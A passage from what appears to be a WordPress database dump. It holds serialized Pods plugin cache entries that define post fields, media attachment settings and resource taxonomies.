1:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:17:\"resource_category\";a:10:{s:4:\"name\";s:17:\"resource_category\";s:5:\"label\";s:19:\"Resource Categories\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:17:\"resource_category\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:17:\"resource_category\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}}s:12:\"resource_tag\";a:10:{s:4:\"name\";s:12:\"resource_tag\";s:5:\"label\";s:13:\"Resource Tags\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:12:\"resource_tag\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:12:\"resource_tag\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}}s:13:\"resource_type\";a:10:{s:4:\"name\";s:13:\"resource_type\";s:5:\"label\";s:14:\"Resource Types\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:13:\"resource_type\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:13:\"resource_type\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}}}}','off'),(5635427,'_transient_timeout_pods_326ef8d2b9fa657d9be7ff6ff9ab99fe','1782403632','off'),(5635428,'_transient_pods_326ef8d2b9fa657d9be7ff6ff9ab99fe','a:0:{}','off'),(5635429,'_transient_timeout_pods_0332fb5b5ffdb0d65756a09bdc76ebea','1782403633','off'),(5635430,'_transient_pods_0332fb5b5ffdb0d65756a09bdc76ebea','a:0:{}','off'),(5635423,'_transient_timeout_pods_b0484f8a3fbe8fc545f149a8e956334a','1782403632','off'),(5635424,'_transient_pods_b0484f8a3fbe8fc545f149a8e956334a','a:0:{}','off'),(5635425,'_transient_timeout_pods_931ab353e1442640d20500decd667245','1782403632','off'),(5635426,'_transient_pods_931ab353e1442640d20500decd667245','a:0:{}','off'),(5635421,'_transient_timeout_pods_2c95c52f59bec34ed45799d4b95747d7','1782403632','off'),(5635422,'_transient_pods_2c95c52f59bec34ed45799d4b95747d7','a:0:{}','off'),(5635419,'_transient_timeout_pods_731791f101710b463803c8d0613fcf05','1782403632','off'),(5635420,'_transient_pods_731791f101710b463803c8d0613fcf05','a:28:{s:11:\"object_type\";s:5:\"media\";s:4:\"type\";s:5:\"media\";s:11:\"object_name\";s:10:\"attachment\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:13:\"wp_pods_media\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:30:\"`t`.`post_type` = \'attachment\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:11:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:10:\"collection\";s:4:\"name\";s:5:\"media\";s:2:\"id\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:5:\"Media\";s:11:\"description\";s:0:\"\";s:4:\"type\";s:5:\"media\";s:7:\"storage\";s:4:\"meta\";s:5:\"adhoc\";b:1;}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:24:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4